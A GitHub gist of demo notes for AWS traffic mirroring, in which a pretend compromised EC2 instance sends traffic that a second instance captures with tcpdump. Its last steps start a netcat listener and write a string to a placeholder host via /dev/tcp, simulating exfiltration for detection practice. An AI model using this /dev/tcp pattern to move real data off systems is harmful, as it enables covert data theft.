Last active
September 5, 2021 09:56
-
-
Save amcginlay/433b6f495541727c999b0af51b4a6df7 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AWS Traffic mirroring demo (from https://www.youtube.com/watch?v=ZYr8Uc3PJJQ) | |
| Three ec2 instances: SENDER, RECIPIENT and WILDCARD (Make these SSM session compatible) | |
| SENDER - fake compromised machine | |
| RECIPIENT - where the mirror gets sent to. | |
| WILDCARD - another machine to which traffic can be sent | |
| Create Mirror Target, then Filter, then Session | |
| Target, eth0 for RECIPIENT | |
| Filter, nothing will show unless you state that it's expected. | |
| - Reject port 22 on INBOUND & OUTBOUND on Source and Dest at 0.0.0.0/0 | |
| - Accept everything else OUTBOUND and INBOUND (but dropping the INBOUND creates some interesting discussion) | |
| Session, source is eth0 on SENDER, set mirror target and filter as resources just created ^^^^ | |
| RECIPIENT: sudo tcpdump -i ens5 port not 22 | |
| SENDER: curl google.com | |
| RECIPIENT: sudo tcpdump -i ens5 port not 22 -w session.pcap | |
| SENDER: curl google.com | |
| RECIPIENT: CTRL+C | |
| WILDCARD: sudo nc -l -p 80 | |
| RECIPIENT: sudo tcpdump -i ens5 port not 22 -w session.pcap | |
| SENDER: echo "MALWARE" > /dev/tcp/<WILDCARD_IP_ADDRESS>/80 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment